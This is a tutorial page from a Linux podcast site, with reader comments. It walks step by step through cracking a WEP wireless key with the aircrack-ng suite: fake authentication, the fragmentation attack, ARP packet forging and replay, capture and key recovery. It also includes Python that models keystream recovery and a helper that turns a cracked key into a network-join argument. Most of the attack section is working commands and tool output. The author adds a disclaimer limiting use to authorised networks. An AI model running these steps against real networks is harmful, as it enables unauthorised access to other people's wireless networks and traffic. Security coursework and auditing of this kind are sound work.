Glad you could stop by the Linux Basement site. Linux Basement is an informational Podcast about Linux, open source software and lots of other wonderful technology. If you want to find out more about open source technologies, subscribe and have a listen!


Finux's student hackers guide to WEP hacking

Article Type: 
Tutorial


As wireless networks keep growing, wifi security needs a constant eye of caution and periodic re-evaluation.  Encryption of wireless networks is nothing new; two main encryption methods are deployed in today's home networks and in a large proportion of business networks.  It has come to light in recent years that the first widely adopted wireless encryption technology, WEP (Wired Equivalent Privacy), has major flaws, and calls for it to be totally deprecated are being heard loud and clear.  It has to be said frankly that WEP can no longer be relied on to secure a network.  In the past you may have been able to argue that it offered some real deterrence from attack; you would be hard pushed to make that argument today.  With the improvement in WEP cracking techniques, recovering the key is a short process with a predictable outcome rather than a time-consuming, laborious task.
 


However, the inherent weaknesses of the WEP protocol were known long before its widespread deployment.  The worrying aspect of cracking WEP today is that it can be done in literally a minute.  Researchers from Darmstadt Technical University broke the record for cracking WEP in 2007, and they did it by cutting the number of encrypted packets that need to be captured.  Before their work you needed to capture anywhere between half a million and two million encrypted packets; they cut this drastically to around 40 thousand packets (that figure gives roughly a 50% chance of success; about 85 thousand gets you to 95%).  Their method is the PTW attack, which is what the -z switch of aircrack-ng selects later in this guide.
 


The main attack that I'm going to focus on is the fragmentation attack.  Here is a quick description, quoted from the aircrack-ng documentation (link below):
 

 

This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.

 

 

Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bytes of PRGA are obtained or sometimes less than 1500 bytes.

 

 

The original paper, The Fragmentation Attack in Practice, by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located here. Here are presentation slides of a related paper. A local copy of the slides is located here. Also see the paper “The Final Nail in WEP's Coffin” on this page.

 

 

http://www.aircrack-ng.org/doku.php?id=fragmentation#description
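The primitive that description relies on is worth seeing concretely.  A WEP frame body is RC4 keystream, generated from IV || key, XORed over plaintext || CRC-32 ICV.  Ciphertext XOR known plaintext therefore gives you the keystream (the PRGA) for that IV, and with the keystream you can encrypt anything up to that length under the same IV without ever knowing the key.  The following Python is an added example written for this page; it is not aircrack-ng code nor code from Bittau's paper.  RC4, the LLC/SNAP header and the CRC-32 ICV are the real constructs; the IVs and frame payloads are constructed sample values, the key is simply the one recovered at the end of this guide, and the "AP" is the same decrypt routine checking the ICV.  It walks one round of the loop: 8 bytes of PRGA from the known LLC/SNAP header of one captured data frame, sixteen forged 4-byte fragments that the AP reassembles and relays under a fresh IV, and 68 bytes of PRGA recovered from the relayed frame.

```python
# Added example for this guide (not aircrack-ng or Bittau's code): one round of
# the fragmentation attack's keystream-recovery loop, modelled on a WEP frame body.
# Real RC4 and CRC-32 ICV; key, IVs and payloads are constructed sample values.
import zlib

# Every IP data frame starts with this LLC/SNAP header, so 8 plaintext bytes
# of any captured data packet are known in advance.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream (KSA + PRGA) for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV (3) || key-id byte || RC4(IV||key) over plaintext||ICV."""
    body = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(body, rc4(iv + wep_key, len(body)))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """What the AP does: decrypt with its key and check the ICV; None on failure."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + wep_key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def recover_prga(frame: bytes, known_plaintext: bytes):
    """Attacker side: ciphertext XOR known plaintext = keystream bytes for this IV."""
    iv = frame[:3]
    return iv, xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def forge_fragment(iv: bytes, prga: bytes, data: bytes) -> bytes:
    """Encrypt `data` under a recovered keystream; no key needed.
    Needs len(data)+4 bytes of PRGA because the ICV is encrypted as well."""
    body = data + icv(data)
    if len(body) > len(prga):
        raise ValueError("not enough keystream for this fragment")
    return iv + b"\x00" + xor(body, prga[:len(body)])


def extend_prga(wep_key: bytes, iv: bytes, prga: bytes, chosen: bytes, relay_iv: bytes):
    """One loop iteration: send `chosen` as fragments forged with the short PRGA
    (8 bytes of PRGA = 4 data bytes + 4 ICV bytes per fragment); the AP, simulated
    with wep_key, reassembles and relays the whole thing under a fresh IV.  Since
    we chose every plaintext byte we learn len(chosen)+4 bytes of keystream for
    that IV.  802.11 allows 16 fragments, hence 64 bytes per round."""
    chunk = len(prga) - 4
    frags = [forge_fragment(iv, prga, chosen[i:i + chunk]) for i in range(0, len(chosen), chunk)]
    parts = [wep_decrypt(wep_key, f) for f in frags]
    if any(p is None for p in parts):
        raise RuntimeError("AP rejected a fragment (bad ICV)")
    reassembled = b"".join(parts)
    relayed = wep_encrypt(wep_key, relay_iv, reassembled)
    return recover_prga(relayed, reassembled + icv(reassembled))


def demo():
    # Key taken from the aircrack-ng output at the end of this guide; IVs are made up.
    wep_key = bytes.fromhex("734f39516d58696e772c646d21")
    captured = wep_encrypt(wep_key, b"\x01\x02\x03", LLC_SNAP_IP + bytes(range(20)))
    iv, prga8 = recover_prga(captured, LLC_SNAP_IP)            # 8 bytes from one data frame
    relay_iv, prga68 = extend_prga(wep_key, iv, prga8, bytes(range(64)), b"\x04\x05\x06")
    return prga8, prga68                                       # 8 -> 68 bytes; repeat to reach 1500
```

Real frames carry the 802.11 header and a key-ID byte in front of all this, and aireplay-ng has to coax the AP into giving it a data frame and accepting the fragments; the arithmetic it is doing on the keystream is exactly the above, which is why it never needs the key and why the recovered .xor file is enough for packetforge-ng to build a valid ARP request.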

 

 

The attack is very easy in practice and really can be broken down into 10 or so steps.  I have used my Eee loaded with Ubuntu 8.04; however you can use BackTrack 3 or any distro, and the packages you need (aircrack-ng and the MadWifi tools, in my case) should be easy to find.  Please only use this for educational purposes, on networks you own or have permission to test.  Please don't use this to break the law.

 

 

I have just done this on my system, so your wireless device names may differ from mine.

 

 

First, run Kismet or whatever wireless scanner you're using and find the network you're going to hack.  You need to find out some key bits of information, namely the wireless network's name (ESSID), the AP's MAC address (BSSID) and what channel it is on.  In my case I found:

 

 

Finux-Wireless-Network, channel 13, BSSID MAC address  00-14-7F-9D-51-11

 

 

So I would suggest that we declare some variables in the shell before we start so that we're not constantly re-typing them.  Note that the aircrack-ng tools want MAC addresses colon-separated (00:14:7F:9D:51:11), even though some tools print them with dashes as above.

 

 

In a terminal, type:

 

 

export AP=00:14:7F:9D:51:11

(that is the AP's MAC address in the colon-separated form the aircrack-ng tools expect; substitute your own, with no brackets or quotes)

 

 

export WIFI=XX:XX:XX:XX:XX:XX

(the MAC address of your own wireless card, ath1 in my case; ifconfig ath1 or macchanger --show ath1 will print it, again colon-separated)

 

 

So, the first command:

 




sudo airmon-ng start wifi0

 

airmon-ng is a bash script designed to put wireless cards into monitor mode.  With the MadWifi driver, wifi0 is the base device and airmon-ng creates a new monitor-mode VAP on it (ath1 here, since ath0 already exists).

 

sudo wlanconfig ath0 destroy

wlanconfig is the MadWifi tool for creating and destroying virtual interfaces (VAPs).  Destroying the managed-mode VAP ath0 stops it competing with the monitor VAP for the radio.  The MadWifi documentation describes the arrangement like this:

 

The current MadWifi driver supports multiple APs and concurrent AP/Station mode operation on the same device. The devices are restricted to using the same underlying hardware, thus are limited to coexisting on the same channel and using the same physical layer features. Each instance of an AP or station is called a Virtual AP (or VAP). Each VAP can be in either AP mode, Station Mode, "special" station mode, and Monitor mode. Every VAP has an associated underlying base device which is created when the driver is loaded.

sudo ifconfig ath1 up
 


sudo iwconfig ath1 mode monitor channel 13

 

ifconfig ath1 up brings the new VAP up, and the iwconfig command puts it into monitor mode (rfmon) on channel 13 (your channel may vary).  The channel must match the AP's, or nothing that follows will see or reach the AP.



sudo aireplay-ng -1 0 -e Finux-Wireless-Network -a $AP -h $WIFI  ath1

 

This is not the injection step yet: -1 0 performs a fake authentication (the 0 is the re-association delay, 0 meaning authenticate and associate once) so that the AP associates your card's MAC ($WIFI) with the ESSID given by -e.  An AP discards data frames from a station that is not associated, so without this step the packets injected later would be silently dropped.  You want to see "Association successful :-)" before continuing; if it fails, work through the list of reasons aireplay-ng prints (MAC filtering on the AP, wrong BSSID or channel, a driver without injection support).



sudo aireplay-ng -5 -b $AP -h $WIFI ath1

 

-5 is the fragmentation attack described above, run against $AP with $WIFI as the source MAC.  It waits for a data packet from the AP (with no clients this will be a broadcast from the AP itself, so it may take a little while), asks whether to use it, and on success saves the recovered keystream to a file in the directory you're working in named fragment-*something*-*here*.xor (aireplay-ng fills in the date and time).



packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment-*something*-*here*.xor -w arp-request

packetforge-ng is a tool designed to forge ARP-request, UDP, ICMP or custom packets.  -0 means an ARP request, -k and -l are the destination and source IP addresses (the broadcast address works whatever the AP's subnet is), -y is the PRGA file from the previous step and -w the output file.  Substitute the real name of the .xor file (fragment-*.xor will do if there is only one).  You should find a file named arp-request in your working directory afterwards.



sudo airodump-ng -c 13 --bssid $AP -w capture ath1

 

airodump-ng is the packet capture tool of aircrack-ng.  It dumps packets directly from the WLAN interface and saves them to a pcap or IVs file.  Here -c 13 and --bssid $AP restrict the capture to our AP's channel and BSSID, so the IVs it collects are all usable, and -w capture makes it write capture-01.cap (the number increments on each run).

 

 

You will need to open another terminal and leave airodump-ng running.  In the new terminal:



sudo aireplay-ng -2 -r arp-request ath1

 

This replays the crafted arp-request we made with packetforge-ng (-2 is interactive replay; answer y when it asks whether to use the packet).  Every time the AP receives the broadcast ARP request it re-broadcasts it encrypted under a fresh IV, and those relayed packets are what airodump-ng is collecting.  You will need to leave this running and open a new terminal.



sudo aircrack-ng -z capture*.cap

 

aircrack-ng is an 802.11 WEP / WPA-PSK key cracker.  It implements the so-called Fluhrer-Mantin-Shamir (FMS) attack, along with some newer attacks by a talented hacker named KoreK, and with -z the PTW attack (the Darmstadt method mentioned earlier), which is what lets it succeed with tens of thousands of IVs rather than millions.  When enough encrypted packets have been gathered, aircrack-ng can almost instantly recover the WEP key.

 

 

This command reads every capture file in your working directory that matches the glob on the command line (airodump-ng is writing capture-01.cap) and starts cracking the WEP key.  If it doesn't have enough IVs yet it re-reads the capture as it grows and tries again.  You should get a screen like this:

 

 

                                 Aircrack-ng 1.0 beta1

                 [00:03:58] Tested 793 keys (got 47545 IVs)

   KB    depth   byte(vote)
    0    4/  5   7E(55296) 01(54528) B5(54528) 3C(53760) B9(53760)
    1    4/  1   46(54528) 2D(54016) A8(53504) D3(53504) DD(53248)
    2    1/  7   AE(57088) 66(55552) 98(55552) A5(55552) 01(55040)
    3   18/  3   F8(53248) 36(52992) 4D(52992) 9C(52736) E7(52736)
    4    0/  1   B9(69120) 4B(56832) 5B(56576) 16(56064) D0(55040)

     KEY FOUND! [ 73:4F:39:51:6D:58:69:6E:77:2C:64:6D:21 ] (ASCII: sO9QmXinw,dm! )

        Decrypted correctly: 100%

 

And that's WEP hacked in less than five minutes (3:58 on the clock above, 47545 IVs), with no clients attached to the network.
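The KEY FOUND! line is the whole payoff, so here is a small added helper, written for this page and not part of aircrack-ng, that pulls it out of aircrack-ng's output, turns the colon-separated hex into the 40- or 104-bit key and its ASCII form, builds the argument iwconfig wants for its key option (the s: prefix marks an ASCII key), and normalises a MAC written with dashes, as the scanner output was transcribed above, into the colon form the -a/-b/-h options expect.  The sample output embedded in it is copied from the run above; everything else is standard-library code with no other assumptions.

```python
# Added helper for this guide (not part of aircrack-ng): parse aircrack-ng's
# result screen and normalise MAC notation for the -a/-b/-h options.
import re

# Copied from the aircrack-ng run shown above (trimmed to the relevant lines).
SAMPLE_OUTPUT = """\
                                 Aircrack-ng 1.0 beta1

                 [00:03:58] Tested 793 keys (got 47545 IVs)

   KB    depth   byte(vote)
    0    4/  5   7E(55296) 01(54528) B5(54528) 3C(53760) B9(53760)
    4    0/  1   B9(69120) 4B(56832) 5B(56576) 16(56064) D0(55040)

     KEY FOUND! [ 73:4F:39:51:6D:58:69:6E:77:2C:64:6D:21 ] (ASCII: sO9QmXinw,dm! )

        Decrypted correctly: 100%
"""

KEY_SIZES = {5: 40, 13: 104}   # WEP-40 and WEP-104, the only key lengths WEP uses


def normalise_mac(mac: str) -> str:
    """Accept 00-14-7F-9D-51-11, 0014.7f9d.5111 or 00:14:7f:...; return AA:BB:CC:DD:EE:FF."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2)).upper()


def parse_aircrack(output: str) -> dict:
    """Extract the key (hex and ASCII), its size, the IV count and the ICV check rate."""
    found = re.search(r"KEY FOUND!\s*\[\s*((?:[0-9A-Fa-f]{2}:?)+)\s*\]", output)
    ivs = re.search(r"got (\d+) IVs", output)
    result = {"found": False, "ivs": int(ivs.group(1)) if ivs else None}
    if not found:
        return result
    key = bytes.fromhex(found.group(1).replace(":", ""))
    if len(key) not in KEY_SIZES:
        raise ValueError(f"unexpected WEP key length: {len(key)} bytes")
    printable = all(0x20 <= b < 0x7F for b in key)   # hex-only keys are common too
    ok = re.search(r"Decrypted correctly:\s*(\d+)%", output)
    hex_groups = "-".join(key.hex().upper()[i:i + 4] for i in range(0, len(key) * 2, 4))
    result.update({
        "found": True,
        "key_hex": key.hex(),
        "key_ascii": key.decode("ascii") if printable else None,
        "bits": KEY_SIZES[len(key)],
        # what to pass to `iwconfig <iface> key ...` to join the network
        "iwconfig_key": "s:" + key.decode("ascii") if printable else hex_groups,
        "decrypted_pct": int(ok.group(1)) if ok else None,
    })
    return result
```

The length check matters in practice: anything other than 5 or 13 bytes means you have mis-pasted the line, and a key that is not printable ASCII has to be given to iwconfig as dash-separated hex rather than with the s: prefix.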

 


 

~~~~~~~~~~

URLs: Interesting Bits

~~~~~~~~~~

http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
http://blip.tv/file/625845
http://www.offensive-security.com/movies/frag-final/frag-final.html
http://wireless-comm.blogspot.com/2008/05/10-easy-steps-to-crack-wireles...
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,18...
http://forums.remote-exploit.org/showthread.php?t=8339
http://www.informit.com/guides/content.aspx?g=security&seqNum=305&f1=rss
http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
http://ubuntuforums.org/showthread.php?t=763911
http://forums.remote-exploit.org/showthread.php?t=9457
http://oxid.netsons.org/phpBB2/viewtopic.php?t=2301&start=0&postdays=0&p...
http://www.youtube.com/results?search_query=wep+fragmentation+attack&sea...
http://www.eweek.com/c/a/Mobile-and-Wireless/The-Final-Final-Nail-in-WEP...
http://www.thelinuxsociety.org.uk/content/finuxs-student-hackers-guide-t...

Thanks for posting this up

Thanks for posting this up Finux. Can't wait to listen to the HPR episode!

Chad

np

My pleasure dude.

Finux http://www.thelinuxsociety.org.uk

here's the hpr episode

Here's the link for the Hacker Public Radio episode: http://www.hackerpublicradio.org/eps/hpr0161.mp3

Finux http://www.thelinuxsociety.org.uk

Glad I saw this

A friend of mine recently had their network encrypted by Comcast and I'm pretty sure it is WEP. I think a change is in store. Finux, you're the man, thanks.

-gilbert

trouble

Not sure where to put this in the forums, so I put it here; I'll move it if I need to. I can't seem to get past the initial attempt to inject packets. I'm using the rt73 serialmonkey drivers on an EDIMAX EW-7318USg. I have done some searching for the errors that I've gotten but to no avail. The driver's readme says packet injection is supported, but I may just be doing something wrong. Here is what I have so far:

sudo airmon-ng start wifi0 #works fine
sudo wlanconfig rausb0 destroy #get the error below
wlanconfig: ioctl: Operation not supported
sudo iwpriv wlan0 rfmontx 1 #allows injection according to the info in the driver's readme
sudo iwconfig rausb0 mode monitor channel 6 #no errors
sudo aireplay-ng -1 0 -e INTEL_wireless -a $AP -h $WIFI rausb0 #you see the output below

17:41:26  Waiting for beacon frame (BSSID: MAC) #changed for privacy
17:41:26  Sending Authentication Request
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower the transmit rate.

Thanks in advance
-Gilbert